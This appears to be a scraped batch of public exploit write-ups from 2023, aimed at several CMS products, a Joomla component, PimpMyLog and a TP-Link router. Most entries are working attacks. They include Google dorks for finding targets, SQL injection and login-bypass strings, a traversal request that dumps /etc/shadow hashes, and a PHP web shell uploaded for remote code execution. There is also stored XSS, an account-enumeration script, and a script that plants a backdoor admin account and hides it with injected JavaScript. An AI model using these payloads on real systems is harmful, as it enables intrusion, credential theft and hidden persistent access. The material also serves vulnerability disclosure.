<pre><code>====================================================================================================================================<br />| # Title : CMS porViaX v2.0 Sql Injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0.1(32-bit) | <br />| # Vendor : https://codecanyon.net/ | <br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use payload : noticias?pg=\<br /><br />[+] http://127.0.0.1/muritiba.ba.govbr/noticias?pg=%5c <==== inject here<br /><br />[+] Login http://127.0.0.1/muritiba.ba.govbr/admin/<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code># Exploit Title: TP-Link TL-WR740N - Authenticated Directory Transversal<br /># Date: 13/7/2023<br /># Exploit Author: Anish Feroz (Zeroxinn)<br /># Vendor Homepage: http://www.tp-link.com<br /># Version: TP-Link TL-WR740n 3.12.11 Build 110915 Rel.40896n<br /># Tested on: TP-Link TL-WR740N<br /><br />---------------------------POC---------------------------<br /><br />Request<br />-------<br /><br />GET /help/../../../etc/shadow HTTP/1.1<br />Host: 192.168.0.1:8082<br />Authorization: Basic YWRtaW46YWRtaW4=<br />Upgrade-Insecure-Requests: 1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Connection: close<br /><br />Response<br />--------<br /><br />HTTP/1.1 200 OK<br />Server: Router Webserver<br />Connection: close<br />WWW-Authenticate: Basic realm="TP-LINK Wireless Lite N Router WR740N"<br />Content-Type: text/html<br /><br /><META http-equiv=Content-Type content="text/html; charset=iso-8859-1"><br /><HTML><br /><HEAD><TITLE>TL-WR740N</TITLE><br /><META http-equiv=Pragma content=no-cache><br /><META http-equiv=Expires content="wed, 26 Feb 1997 08:21:57 GMT"><br /><LINK href="/dynaform/css_help.css" rel=stylesheet type="text/css"><br /><SCRIPT language="javascript" type="text/javascript"><!--<br />if(window.parent == window){window.location.href="http://192.168.0.1";}<br />function Click(){ return false;}<br />document.oncontextmenu=Click;<br />function doPrev(){history.go(-1);}<br />//--></SCRIPT><br />root:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::<br />Admin:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::<br />bin::10933:0:99999:7:::<br />daemon::10933:0:99999:7:::<br />adm::10933:0:99999:7:::<br />lp:*:10933:0:99999:7:::<br />sync:*:10933:0:99999:7:::<br />shutdown:*:10933:0:99999:7:::<br />halt:*:10933:0:99999:7:::<br />uucp:*:10933:0:99999:7:::<br />operator:*:10933:0:99999:7:::<br />nobody::10933:0:99999:7:::<br />ap71::10933:0:99999:7:::<br /><br /></code></pre>
<pre><code>## Title: pluck-4.7.18 - FI + RCE.<br />## Author: nu11secur1ty<br />## Date: 07.19.2023<br />## Vendor: https://github.com/pluck-cms/pluck/wiki<br />## Software: https://github.com/pluck-cms/pluck<br />## Reference: https://portswigger.net/daily-swig/rce<br />## Reference: https://portswigger.net/web-security/file-upload<br /><br /><br />## Description:<br />The attacker who already has an account can upload a fake module to<br />the system and can execute the content from this module<br />on the server. In this example, the attacker executes an info file<br />from the already fake uploaded module and gets all information for<br />this system. This is a CRITICAL Vulnerability.<br />The problem is that these developers are not making a strong<br />sanitizing upload function and do not restrict the execution from<br />inside<br />of the server.<br /><br />## Staus: HIGH Vulnerability<br /><br />[+]Exploit: prostak.php<br /><br />- - - NOTE: The attacker also can upload an EXE file, which file he<br />can execute or download!<br /><br />```php<br /><?php<br />// by nu11secur1ty - 2023<br /> phpinfo();<br />?><br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/pluck/2023/pluck-4.7.18)<br /><br />## Proof and Exploit<br />[href](https://www.nu11secur1ty.com/2023/07/pluck-4718-fi-rce.html)<br /><br />## Time spend:<br />00:35:00<br /><br /><br /></code></pre>
<pre><code>Exploit Title: Blackcat Cms v1.4 - Remote Code Execution (RCE)<br />Application: blackcat Cms<br />Version: v1.4<br />Bugs: RCE<br />Technology: PHP<br />Vendor URL: https://blackcat-cms.org/<br />Software Link: https://github.com/BlackCatDevelopment/BlackCatCMS<br />Date of found: 13.07.2023<br />Author: Mirabbas Ağalarov<br />Tested on: Linux <br /><br /><br />2. Technical Details & POC<br />========================================<br />steps: <br />1. login to account as admin<br />2. go to admin-tools => jquery plugin (http://localhost/BlackCatCMS-1.4/upload/backend/admintools/tool.php?tool=jquery_plugin_mgr)<br />3. upload zip file but this zip file must contains poc.php <br />poc.php file contents <br /><?php $a=$_GET['code']; echo system($a);?><br />4.Go to http://localhost/BlackCatCMS-1.4/upload/modules/lib_jquery/plugins/poc/poc.php?code=cat%20/etc/passwd<br /><br />Poc request<br /><br />POST /BlackCatCMS-1.4/upload/backend/admintools/tool.php?tool=jquery_plugin_mgr HTTP/1.1<br />Host: localhost<br />Content-Length: 577<br />Cache-Control: max-age=0<br />sec-ch-ua: <br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: ""<br />Upgrade-Insecure-Requests: 1<br />Origin: http://localhost<br />Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBRByJwW3CUSHOcBT<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Referer: http://localhost/BlackCatCMS-1.4/upload/backend/admintools/tool.php?tool=jquery_plugin_mgr<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: cat7288sessionid=7uv7f4kj7hm9q6jnd6m9luq0ti<br />Connection: close<br /><br />------WebKitFormBoundaryBRByJwW3CUSHOcBT<br />Content-Disposition: form-data; name="upload"<br /><br />1<br />------WebKitFormBoundaryBRByJwW3CUSHOcBT<br />Content-Disposition: form-data; name="userfile"; filename="poc.zip"<br />Content-Type: application/zip<br /><br />PKvalsdalsfapoc.php<?php <br />$a=$_GET['code']; <br />echo system($a);<br />?><br />blabalaboalpoc.php<br />blablabla<br />------WebKitFormBoundaryBRByJwW3CUSHOcBT<br />Content-Disposition: form-data; name="submit"<br /><br />Upload<br />------WebKitFormBoundaryBRByJwW3CUSHOcBT--<br /><br /><br /></code></pre>
<pre><code>#Exploit Title: Backdrop Cms v1.25.1 - Stored Cross-Site Scripting (XSS)<br />#Application: Backdrop Cms<br />#Version: v1.25.1<br />#Bugs: Stored Xss<br />#Technology: PHP<br />#Vendor URL: https://backdropcms.org/<br />#Software Link: https://github.com/backdrop/backdrop/releases/download/1.25.1/backdrop.zip<br />#Date of found: 12-07-2023<br />#Author: Mirabbas Ağalarov<br />#Tested on: Linux <br /><br />2. Technical Details & POC<br />========================================<br /><br />1. login to account<br />2. go to http://localhost/backdrop/?q=admin/config/system/site-information<br />3. upload svg file<br /><br />"""<br /><?xml version="1.0" standalone="no"?><br /><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><br /><br /><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"><br /> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/><br /> <script type="text/javascript"><br /> alert(document.location);<br /> </script><br /></svg><br />"""<br />4. go to svg file (http://localhost/backdrop/files/malas_2.svg)<br /><br /><br />Request<br /><br />POST /backdrop/?q=admin/config/system/site-information HTTP/1.1<br />Host: localhost<br />Content-Length: 2116<br />Cache-Control: max-age=0<br />sec-ch-ua: <br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: ""<br />Upgrade-Insecure-Requests: 1<br />Origin: http://localhost<br />Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryVXWRsHHM3TVjALpg<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Referer: http://localhost/backdrop/?q=admin/config/system/site-information<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: SESS31b3aee8377692ae3f36f0cf7fe0e752=ZuJtSS2iu5SvcKAFtpK8zPAxrnmFebJ1q26hXhAh__E<br />Connection: close<br /><br />------WebKitFormBoundaryVXWRsHHM3TVjALpg<br />Content-Disposition: form-data; name="site_name"<br /><br />My Backdrop Site<br />------WebKitFormBoundaryVXWRsHHM3TVjALpg<br />Content-Disposition: form-data; name="site_slogan"<br /><br /><br />------WebKitFormBoundaryVXWRsHHM3TVjALpg<br />Content-Disposition: form-data; name="site_mail"<br /><br />admin@admin.com<br />------WebKitFormBoundaryVXWRsHHM3TVjALpg<br />Content-Disposition: form-data; name="files[site_logo_upload]"; filename="malas.svg"<br />Content-Type: image/svg+xml<br /><br /><?xml version="1.0" standalone="no"?><br /><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><br /><br /><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"><br /> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/><br /> <script type="text/javascript"><br /> alert(document.location);<br /> </script><br /></svg><br /><br />------WebKitFormBoundaryVXWRsHHM3TVjALpg<br />Content-Disposition: form-data; name="site_logo_path"<br /><br /><br />------WebKitFormBoundaryVXWRsHHM3TVjALpg<br />Content-Disposition: form-data; name="files[site_favicon_upload]"; filename=""<br />Content-Type: application/octet-stream<br /><br /><br />------WebKitFormBoundaryVXWRsHHM3TVjALpg<br />Content-Disposition: form-data; name="site_favicon_path"<br /><br />core/misc/favicon.ico<br />------WebKitFormBoundaryVXWRsHHM3TVjALpg<br />Content-Disposition: form-data; name="site_frontpage"<br /><br />home<br />------WebKitFormBoundaryVXWRsHHM3TVjALpg<br />Content-Disposition: form-data; name="site_403"<br /><br /><br />------WebKitFormBoundaryVXWRsHHM3TVjALpg<br />Content-Disposition: form-data; name="site_404"<br /><br /><br />------WebKitFormBoundaryVXWRsHHM3TVjALpg<br />Content-Disposition: form-data; name="form_build_id"<br /><br />form-PnR6AFEKCB5hAWH3pDT2J0kkZswH0Rdm0qbOFGqNj-Q<br />------WebKitFormBoundaryVXWRsHHM3TVjALpg<br />Content-Disposition: form-data; name="form_token"<br /><br />siOWtyEEFVg7neDMTYPHVZ2D3D5U60S38l_cRHbnW40<br />------WebKitFormBoundaryVXWRsHHM3TVjALpg<br />Content-Disposition: form-data; name="form_id"<br /><br />system_site_information_settings<br />------WebKitFormBoundaryVXWRsHHM3TVjALpg<br />Content-Disposition: form-data; name="op"<br /><br />Save configuration<br />------WebKitForm<br /><br /></code></pre>
<pre><code># Exploit Title: Joomla! com_booking component 2.4.9 - Information Leak (Account enumeration)<br /># Google Dork: inurl:"index.php?option=com_booking"<br /># Date: 07/12/2023<br /># Exploit Author: qw3rTyTy<br /># Vendor Homepage: http://www.artio.net/<br /># Software Link: http://www.artio.net/downloads/joomla/book-it/book-it-2-free/download<br /># Version: 2.4.9<br /># Tested on: Slackware/Nginx/Joomla! 3.10.11<br />#<br />##<br /># File: site/booking.php<br />#<br /># <?php<br /># [...]<br />#18 include_once (JPATH_COMPONENT_ADMINISTRATOR . DS . 'booking.php');<br /># [...]<br />#<br /># File: admin/booking.php<br />#<br /># <?php<br /># [...]<br />#104 if (class_exists(($classname = AImporter::controller()))) {<br />#105 $controller = new $classname();<br />#106 /* @var $controller JController */<br />#107 $controller->execute(JRequest::getVar('task'));<br />#108 $controller->redirect();<br />#109 }<br /># [...]<br />#<br /># File: admin/controllers/customer.php<br />#<br /># <?php<br /># [...]<br />#240 function getUserData() {<br />#241 $user = JFactory::getUser(JRequest::getInt('id'));<br />#242 $data = array('name' => $user->name, 'username' => $user->username, 'email' => $user->email);<br />#243 die(json_encode($data));<br />#244 }<br /># [...]<br />#<br /># A following GET request is equivalent to doing a query like 'SELECT name, username, email FROM abcde_users WHERE id=123'.<br />#<br /># curl -X GET http://target/joomla/index.php?option=com_booking&controller=customer&task=getUserData&id=123<br />#<br /># So, an attacker can easily enumerate all accounts by bruteforcing.<br />#<br />##<br />import argparse<br />import urllib.parse<br />import requests<br />from sys import exit<br />from time import sleep<br /><br />def enumerateAccounts(options):<br /> i = 1<br /> url = options.url<br /> url = url + "/index.php?option=com_booking&controller=customer&task=getUserData&id="<br /><br /> while True:<br /> try:<br /> response = requests.get("{}{}".format(url, str(i)))<br /><br /> if response.status_code == 200:<br /> try:<br /> jsondocument = response.json()<br /> if jsondocument["name"] != None:<br /> print(jsondocument)<br /> except requests.exceptions.JSONDecodeError:<br /> raise<br /> else:<br /> break<br /> except Exception as ex:<br /> print(ex)<br /> break<br /><br /> i += 1<br /><br />def main():<br /> p = argparse.ArgumentParser()<br /> p.add_argument("-u", "--url", type=str, required=True)<br /> parsed = p.parse_args()<br /><br /> try:<br /> t = urllib.parse.urlparse(parsed.url)<br /> except ValueError as ex:<br /> print(ex)<br /> exit()<br /><br /> if not t[0].startswith("http") and not t[0].startswith("https"):<br /> print("Improper URL given.")<br /> exit()<br /><br /> if len(t[1]) == 0:<br /> print("Improper URL given.")<br /> exit()<br /><br /> enumerateAccounts(parsed)<br /><br />if __name__ == "__main__":<br /> main()<br /> <br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : CMS EngePlus v2.0.1 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit) | <br />| # Vendor : https://codecanyon.net/ | <br />| # Dork : intext:Desenvolvido por EngePlus site:br |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use Payload : /conteudo.php?int=noticia&codigo_not=8'<script>alert(/indoushka/);</script><br /><br />[+] http://127.0.0.1/rebemilcombr/conteudo.php?int=noticia&codigo_not=8%27%3Cscript%3Ealert(/indoushka/);%3C/script%3E<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code># Exploit Title: PimpMyLog v1.7.14 - Improper access control<br /># Date: 2023-07-10<br /># Exploit Author: thoughtfault<br /># Vendor Homepage: https://www.pimpmylog.com/<br /># Software Link: https://github.com/potsky/PimpMyLog<br /># Version: 1.5.2-1.7.14<br /># Tested on: Ubuntu 22.04<br /># CVE : N/A<br /># Description: PimpMyLog suffers from improper access control on the account creation endpoint, allowing a remote attacker to create an admin account without any existing permissions. The username is not sanitized and can be leveraged as a vector for stored XSS. This allows the attacker to hide the presence of the backdoor account from legitimate admins. Depending on the previous configuration, an attacker may be able to view sensitive information in apache, iis, nginx, and/or php logs. The attacker can view server-side environmental variables through the debug feature, which may include passwords or api keys.<br />import requests<br />import argparse<br />from base64 import b64encode<br /><br />js = """var table = document.getElementById("userlisttable");<br />var rows = table.getElementsByTagName("tr");<br />for (var i = 0; i < rows.length; i++) {<br /> var cells = rows[i].getElementsByTagName("td");<br /> for (var j = 0; j < cells.length; j++) {<br /> var anchors = cells[j].getElementsByTagName("a");<br /> for (var k = 0; k < anchors.length; k++) {<br /> if (<br /> anchors[k].innerText === "{}" ||<br /> anchors[k].innerText.includes("atob(") ||<br /> anchors[k].querySelector("script") !== null<br /> ) {<br /> rows[i].parentNode.removeChild(rows[i]);<br /> }<br /> }<br /> }<br />}<br />var userCountElement = document.querySelector('.lead');<br />var userCountText = userCountElement.textContent;<br />var userCount = parseInt(userCountText);<br />if(!isNaN(userCount)){<br /> userCount--;<br /> userCountElement.textContent = userCount + ' Users';<br />}"""<br /><br />payload = "<script>eval(atob('{}'));</script>"<br /><br /><br />def backdoor(url, username, password):<br /> config_url = url + '/inc/configure.php'<br /><br /> print("[*] Creating admin account...")<br /> r = requests.post(config_url, data={'s':'authsave', 'u': username, 'p': password})<br /> if r.status_code != 200:<br /> print("[!] An error occured")<br /> return<br /><br /> print("[*] Hiding admin account...")<br /> base64_js = b64encode(js.format(username).encode()).decode()<br /> xss_payload = payload.format(base64_js)<br /><br /> r = requests.post(config_url, data={'s':'authsave', 'u': xss_payload, 'p': password})<br /> if r.status_code != 200:<br /> print("[!] An error occured")<br /> return<br /><br /><br /> print("[*] Exploit finished!")<br /><br />parser = argparse.ArgumentParser()<br />parser.add_argument('--url', help='The base url of the target', required=True)<br />parser.add_argument('--username', default='backdoor', help='The username of the backdoor account')<br />parser.add_argument('--password', default='backdoor', help='The password of the backdoor account')<br />args = parser.parse_args()<br /><br />backdoor(args.url.rstrip('/'), args.username, args.password)<br /> <br /></code></pre>
<pre><code>======================================================================================================================================<br />| # Title : ِCMS D-Creations v1.0 auth by pass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit) |<br />| # Vendor : https://codecanyon.net/ | <br />======================================================================================================================================<br /><br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine <br /><br />[+] Use admin : admin'-- - & pass : P@cK3t<br /><br />[+] panel : http://127.0.0.1/cetithkorg/Dashboard.php<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : CCOM Events CMS v0.1.02 upload Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit) |<br />| # Vendor : http://www.cyberunivers.com/ | <br />| # Dork : "details_news.php?id_news= " |<br />====================================================================================================================================<br /><br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine .<br /><br />[+] Unauthorized administrator access. Allows any visitor to upload malicious files and run them.<br /><br />[+] use payload : /js/fckeditor/editor/plugins/ajaxfilemanager/ajaxfilemanager.php<br /><br />[+] http://127.0.0.1/sacot-dzcom/js/fckeditor/editor/plugins/ajaxfilemanager/ajaxfilemanager.php<br /><br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>